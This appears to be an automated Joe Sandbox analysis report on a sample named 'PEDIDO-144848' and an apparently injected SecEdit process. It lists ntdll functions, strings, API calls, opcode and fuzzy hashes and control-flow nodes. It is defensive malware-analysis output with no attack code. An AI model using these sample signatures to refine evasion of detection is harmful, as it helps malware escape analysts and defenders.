                                                        • API String ID: 3446177414-4227709934
                                                        • Opcode ID: 2ed20d9499c0f599f8995d47749c8edc42795d45935d44950212df214e13d6fd
                                                        • Instruction ID: a1328c057df7291ad80ca9bc843fabfd5b51b187a5863e714cbd55de662d20dc
                                                        • Opcode Fuzzy Hash: 2ed20d9499c0f599f8995d47749c8edc42795d45935d44950212df214e13d6fd
                                                        • Instruction Fuzzy Hash: 7B414AB9E00209AFDB01DF99C980ADEBFB9FF48354F214169E924A7340D771EA01CB90
                                                        Function 36CAF8F8 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                        • API String ID: 3446177414-3492000579
                                                        • Opcode ID: 4c656f2e6bd3fc9419f030907f1bc8e58ef3f420d4673d04328632dc55133f0e
                                                        • Instruction ID: b5a7c633b2605153bdd03a2c297fedc0ffbc6a5a4105a6041bd5a7e64ccf6ba8
                                                        • Opcode Fuzzy Hash: 4c656f2e6bd3fc9419f030907f1bc8e58ef3f420d4673d04328632dc55133f0e
                                                        • Instruction Fuzzy Hash: F871FD31914786DFDB01CFA9D890AADFBF2FF48304F04815AE494AB262CB369945CF91
                                                        Function 36BF6565 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        • LdrpLoadShimEngine, xrefs: 36C5984A, 36C5988B
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 36C59854, 36C59895
                                                        • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 36C59885
                                                        • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 36C59843
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 3446177414-3589223738
                                                        • Opcode ID: 7e87153fb7a4793bc03981088bc899372011dd62b44ededc994b07d42fb605ac
                                                        • Instruction ID: 70a5a9063f2f1a3c772861784e1d4683fef66376ee3c428fe065b38c2f9500de
                                                        • Opcode Fuzzy Hash: 7e87153fb7a4793bc03981088bc899372011dd62b44ededc994b07d42fb605ac
                                                        • Instruction Fuzzy Hash: AF513735A20398AFDB04DBA9CC54EDDBBB6EB44304F05016AEA40FF296DB719C55CB81
                                                        Function 36C2DA20 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                        • API String ID: 3446177414-3224558752
                                                        • Opcode ID: 5badefd4316b9726c876ec30880d96dcf6ea54958ea5a2ac0437a541a6ed4187
                                                        • Instruction ID: 1723f8c7c943395e43e4b99d542c47d737961d779ae28e2580b0e2b3b7753663
                                                        • Opcode Fuzzy Hash: 5badefd4316b9726c876ec30880d96dcf6ea54958ea5a2ac0437a541a6ed4187
                                                        • Instruction Fuzzy Hash: 4E417835A14740DFEB01CF26C994BA9B7B5FF00368F1484ADE8259B781CB78E984CB95
                                                        Function 36CAECD7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 36CAEDE3
                                                        • HEAP: , xrefs: 36CAECDD
                                                        • Entry Heap Size , xrefs: 36CAEDED
                                                        • ---------------------------------------, xrefs: 36CAEDF9
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                        • API String ID: 3446177414-1102453626
                                                        • Opcode ID: 291547939b1c6c89955d73b061f0174c13c4e9dc62c0286f05e406fc91bff44e
                                                        • Instruction ID: 4710d883c8c392b18f4a0e91a88989b5feb0569859fd3980d196cfc5b7d794e1
                                                        • Opcode Fuzzy Hash: 291547939b1c6c89955d73b061f0174c13c4e9dc62c0286f05e406fc91bff44e
                                                        • Instruction Fuzzy Hash: 8A414939E10256DFC704CF19C884999BBB6EB89354B25C06ED504EF222D732EC42DBE0
                                                        Function 36C2DAC0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                        • API String ID: 3446177414-1222099010
                                                        • Opcode ID: bcdde4c54c3493970093d8241c01c809bda99ad99f4554123c498fa6e52cdb24
                                                        • Instruction ID: 89c40b6c0580533ea42cda906b3adcb64db88de6d894c214f4a01eb0c5143edf
                                                        • Opcode Fuzzy Hash: bcdde4c54c3493970093d8241c01c809bda99ad99f4554123c498fa6e52cdb24
                                                        • Instruction Fuzzy Hash: 63316935514BC4DFEB12CF25C86CF8977A5EF00758F048499E8118B6A1CB69E944CF56
                                                        Function 36C09046 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: $$@
                                                        • API String ID: 3446177414-1194432280
                                                        • Opcode ID: 1e572c7134464542ef998a55e3dcb5daa69598a4b973af28a24c29f442311e44
                                                        • Instruction ID: 383e3d603758f716bdcd6f18c8b9534bf4e9ca1d7390184905915cf39307e46d
                                                        • Opcode Fuzzy Hash: 1e572c7134464542ef998a55e3dcb5daa69598a4b973af28a24c29f442311e44
                                                        • Instruction Fuzzy Hash: 67815DB1D002699BDB21CF55CC44BEEB7B8AF08714F0041EAE909B7280D7749E85CFA5
                                                        Function 36C34C3D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        • Querying the active activation context failed with status 0x%08lx, xrefs: 36C73466
                                                        • LdrpFindDllActivationContext, xrefs: 36C73440, 36C7346C
                                                        • minkernel\ntdll\ldrsnap.c, xrefs: 36C7344A, 36C73476
                                                        • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 36C73439
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                        • API String ID: 3446177414-3779518884
                                                        • Opcode ID: 4a68de64a22ec8596ca3f82549833234ccb523baa149ad2082b94bf7a160e778
                                                        • Instruction ID: 29f63d36e505b0e0e9753b9421b3bc21a41303331616e9a0ba8fb2621ff3f341
                                                        • Opcode Fuzzy Hash: 4a68de64a22ec8596ca3f82549833234ccb523baa149ad2082b94bf7a160e778
                                                        • Instruction Fuzzy Hash: 1E31F6B6E06351AFFB11BB06A844AD5BAA4FF01394F72C16ED504AB150D768DC88CBF1
                                                        Function 36903AA9 Relevance: 8.8, Strings: 7, Instructions: 99COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570794095.0000000036900000.00000040.00001000.00020000.00000000.sdmp, Offset: 36900000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36900000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HYDH$LPU_$UQ][$U_]H$]HUS$]JUZ$]LLP
                                                        • API String ID: 0-1800400536
                                                        • Opcode ID: 64279eaad89b32bd996c2e165d779f1ddae72a478ecf51e9cce80b56bab29252
                                                        • Instruction ID: d92304a6394e71b7b6292a94b770ba36b7ddd90b0ce09e792a42239168f681a4
                                                        • Opcode Fuzzy Hash: 64279eaad89b32bd996c2e165d779f1ddae72a478ecf51e9cce80b56bab29252
                                                        • Instruction Fuzzy Hash: D541D7B0914348DFEB01DF14D040BDEBBB0FB09718F91462DE85AAB241DB768259CB86
                                                        Function 36BFF8B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                        • API String ID: 3446177414-3610490719
                                                        • Opcode ID: 8e6b0c4a9be6bcdecc6ac97b3334a9a952694908ae0e118db4d005a6b5e3a1e0
                                                        • Instruction ID: 4850a4f2dca8b8a3795ee2ffd715276a4d8a22f313a393d2d8e358905fc7452b
                                                        • Opcode Fuzzy Hash: 8e6b0c4a9be6bcdecc6ac97b3334a9a952694908ae0e118db4d005a6b5e3a1e0
                                                        • Instruction Fuzzy Hash: 09911371A24B60ABE305DF25CC40B1AB7A9EF48644F104559EA409F2A2DF35E849CF96
                                                        Function 36C20AEB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 36C69F2E
                                                        • Failed to allocated memory for shimmed module list, xrefs: 36C69F1C
                                                        • LdrpCheckModule, xrefs: 36C69F24
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 3446177414-161242083
                                                        • Opcode ID: 89e06d85d50aa80f916685de458877e20ac993a413e8f615d0d3189f45573c58
                                                        • Instruction ID: 3efc209457495e4f44e24ee358826882a09f689136593eb775e63f0d8ab31561
                                                        • Opcode Fuzzy Hash: 89e06d85d50aa80f916685de458877e20ac993a413e8f615d0d3189f45573c58
                                                        • Instruction Fuzzy Hash: 6271DD75E006059FEF14DF6AC980AAEB7F1EF48608F18406EE905EB351E734A942CB95
                                                        Function 36C2EE48 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c4f8c8a890ab5ee843ed49d73d3ed203c94fa2f422e3de4fb4dd0675469bdff1
                                                        • Instruction ID: 37646f212d650d64d495bbbcb9432a953b92406896992b43433e4e191aa6a339
                                                        • Opcode Fuzzy Hash: c4f8c8a890ab5ee843ed49d73d3ed203c94fa2f422e3de4fb4dd0675469bdff1
                                                        • Instruction Fuzzy Hash: 59E1E0B5D00718CFEF25CFAAD980A8DBBF5BF48304F24452AE955A7260DB70A881CF50
                                                        Function 36CDA04A Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID:
                                                        • API String ID: 3446177414-0
                                                        • Opcode ID: ab42e56232eda1e3b5be94fba4320e2cd072bf05ca7c22c6b30758f7fc571729
                                                        • Instruction ID: d3690f818b9591c26d9b0d0db491407fd3c441080a4dde27c9df451a2ee2e029
                                                        • Opcode Fuzzy Hash: ab42e56232eda1e3b5be94fba4320e2cd072bf05ca7c22c6b30758f7fc571729
                                                        • Instruction Fuzzy Hash: 91515D75B10662DFEB08CE9AC890A19B7E5FF89394B24416DD606DB710DBB1FC41CB80
                                                        Function 36C37A4F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                        • String ID:
                                                        • API String ID: 4281723722-0
                                                        • Opcode ID: b3b49daf2ee7b5eee842b575af4792a721db517fae30dc364c5cafb9ae01e9c2
                                                        • Instruction ID: 9a57c86338d8cf8375914aeeada54e1536e39ad9e2eece40aeaa0644b5e7ccb8
                                                        • Opcode Fuzzy Hash: b3b49daf2ee7b5eee842b575af4792a721db517fae30dc364c5cafb9ae01e9c2
                                                        • Instruction Fuzzy Hash: CC31E275E016689FCF05DFA9D844A9DBBB1FB48320F10816AE611FB390DB359901CFA5
                                                        Function 36C058E0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @
                                                        • API String ID: 0-2766056989
                                                        • Opcode ID: aa9ec42df9498ce8a945a8f8977c5c8d3fc9af61753f2915d25bc7cfa6521180
                                                        • Instruction ID: 6a2b600cd92d06319b5467abb58c6f9ceb5a2a1e5a84b79de7b6c81520c02cfc
                                                        • Opcode Fuzzy Hash: aa9ec42df9498ce8a945a8f8977c5c8d3fc9af61753f2915d25bc7cfa6521180
                                                        • Instruction Fuzzy Hash: EA3259B4D04769DFEB21CF65CA84BD9BBB4BF08308F5040EAD549A7242DB749A84CF91
                                                        Function 36C34B79 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0$Flst
                                                        • API String ID: 0-758220159
                                                        • Opcode ID: 401867ee89658cb643de28daa8fe82de6eeeb4058e4c6c8d99808c6c1762b957
                                                        • Instruction ID: 8bf1c6d7cac13536d40531bd42d01aed028ad92142975aa817888478cf1fb161
                                                        • Opcode Fuzzy Hash: 401867ee89658cb643de28daa8fe82de6eeeb4058e4c6c8d99808c6c1762b957
                                                        • Instruction Fuzzy Hash: 7151ACB1E126588FEB24DF95D884689FBF5EF40398F24C02DD009DB250EB74D98ACB90
                                                        Function 36BFDF21 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: 0$0
                                                        • API String ID: 3446177414-203156872
                                                        • Opcode ID: 005c26ba5a785dd157b39ebe8884f3a548e33001d068c8407003647724426368
                                                        • Instruction ID: b7c7ab86406c14099380f3eda52e8fa72583b93ec75e6a7825afbafa4e3b3a47
                                                        • Opcode Fuzzy Hash: 005c26ba5a785dd157b39ebe8884f3a548e33001d068c8407003647724426368
                                                        • Instruction Fuzzy Hash: DC418FB5A187119FD340CF29C444A5ABBE5FB88354F00492EF588DB310D772EA09CF96

                                                        Execution Graph

                                                        Execution Coverage:0.5%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:9
                                                        Total number of Limit Nodes:1
                                                        execution_graph 71646 30a2b20 71648 30a2b2a 71646->71648 71649 30a2b3f LdrInitializeThunk 71648->71649 71650 30a2b31 71648->71650 71651 2edeeba 71652 2edeeed 71651->71652 71653 2edf057 NtQueryInformationProcess 71652->71653 71654 2edf091 71652->71654 71653->71654 71659 30a29f0 LdrInitializeThunk

                                                        Executed Functions

                                                        Function 02EDEEBA Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 547nativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 2edeeba-2edeeeb 1 2edeeed-2edef04 call 2ee10d8 0->1 2 2edef09-2edef28 call 2ee10f8 call 2edcec8 0->2 1->2 8 2edef2e-2edf02e call 2ededf8 call 2ee10f8 call 2ee5064 call 2ed0398 call 2ee06b8 call 2ed0398 call 2ee06b8 call 2ee2dc8 2->8 9 2edf4e6-2edf4f1 2->9 26 2edf4da-2edf4e1 call 2ededf8 8->26 27 2edf034-2edf08c call 2ed0398 call 2ee06b8 NtQueryInformationProcess call 2ee10f8 8->27 26->9 34 2edf091-2edf0c2 call 2ed0398 call 2ee06b8 27->34 39 2edf0c4-2edf0d1 34->39 40 2edf0d6-2edf14c call 2ee5072 call 2ed0398 call 2ee06b8 34->40 39->26 40->39 49 2edf152-2edf164 call 2ee509c 40->49 52 2edf1b4-2edf1f4 call 2ed0398 call 2ee06b8 call 2ee3728 49->52 53 2edf166-2edf1af call 2ee1de8 49->53 63 2edf1f6-2edf20e 52->63 64 2edf213-2edf303 call 2ed0398 call 2ee06b8 call 2ee50aa call 2ed0398 call 2ee06b8 call 2ee30e8 call 2ee10a8 * 3 call 2ee509c 52->64 53->26 63->26 87 2edf305-2edf32e call 2ee509c call 2ee10a8 call 2ee50fe call 2ee50b8 64->87 88 2edf330-2edf345 call 2ee509c 64->88 99 2edf385-2edf38f 87->99 93 2edf36e-2edf380 call 2ee1d28 88->93 94 2edf347-2edf369 call 2ee2898 88->94 93->99 94->93 101 2edf395-2edf3df call 2ed0398 call 2ee06b8 call 2ee3408 call 2ee509c 99->101 102 2edf457-2edf4ba call 2ed0398 call 2ee06b8 call 2ee3a48 99->102 121 2edf414-2edf41b 101->121 122 2edf3e1-2edf40a call 2ee5148 call 2ee50fe 101->122 102->26 129 2edf4bc-2edf4d5 call 2ee10d8 102->129 124 2edf41d-2edf425 call 2ee509c 121->124 125 2edf427-2edf432 121->125 122->121 124->102 124->125 125->102 130 2edf434-2edf452 call 2ee3d68 125->130 129->26 130->102
                                                        APIs
                                                        • NtQueryInformationProcess.NTDLL ref: 02EDF076
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.117102734713.0000000002ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_2ed0000_SecEdit.jbxd
                                                        Similarity
                                                        • API ID: InformationProcessQuery
                                                        • String ID: 0
                                                        • API String ID: 1778838933-4108050209
                                                        • Opcode ID: e350af2d25e8185498569a65e6cab54bc3c57a624a3b141a1f85aac9bd0ff6c1
                                                        • Instruction ID: 5dd63ca70cf79b8d923e2a847cfb2725d476408837c876ba8c2efd57441744db
                                                        • Opcode Fuzzy Hash: e350af2d25e8185498569a65e6cab54bc3c57a624a3b141a1f85aac9bd0ff6c1
                                                        • Instruction Fuzzy Hash: A6023A70558A8C8FCFA5EF68C894AEE77E2FB95304F50961AE84AC7240DF34D645CB41
                                                        Function 030A34E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 152 30a34e0-30a34ec LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.117103104867.0000000003030000.00000040.00001000.00020000.00000000.sdmp, Offset: 03030000, based on PE: true
                                                        • Associated: 00000004.00000002.117103104867.0000000003159000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000004.00000002.117103104867.000000000315D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_3030000_SecEdit.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: ac68d01994be1a14878dc4a0b7b46ee7d315c8c60d1d5dd9fffe26b3e63b8436
                                                        • Instruction ID: e011962b083e950d2ffcaf7fd2201347cf70deeac84a0f2d4b871915cd11cc4a
                                                        • Opcode Fuzzy Hash: ac68d01994be1a14878dc4a0b7b46ee7d315c8c60d1d5dd9fffe26b3e63b8436
                                                        • Instruction Fuzzy Hash: B490023160614803D500A1588614786105987E0201F61C815A0414569DC7A5895175A2
                                                        Function 030A2B00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 142 30a2b00-30a2b0c LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.117103104867.0000000003030000.00000040.00001000.00020000.00000000.sdmp, Offset: 03030000, based on PE: true
                                                        • Associated: 00000004.00000002.117103104867.0000000003159000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000004.00000002.117103104867.000000000315D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_3030000_SecEdit.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: d893f7260c0557563eed98b9c840ed769b9a9f806398f4929203ad31d0771f1f
                                                        • Instruction ID: 716391dc9aa356b793d5c5b89485ea2e80cfa63c680ebf4f8cf7a9657561de4e
                                                        • Opcode Fuzzy Hash: d893f7260c0557563eed98b9c840ed769b9a9f806398f4929203ad31d0771f1f
                                                        • Instruction Fuzzy Hash: A590023120608C43D540B1588504AC6006987E0305F51C415A0054695DD7358D55B661
                                                        Function 030A2B10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 143 30a2b10-30a2b1c LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.117103104867.0000000003030000.00000040.00001000.00020000.00000000.sdmp, Offset: 03030000, based on PE: true
                                                        • Associated: 00000004.00000002.117103104867.0000000003159000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000004.00000002.117103104867.000000000315D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_3030000_SecEdit.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
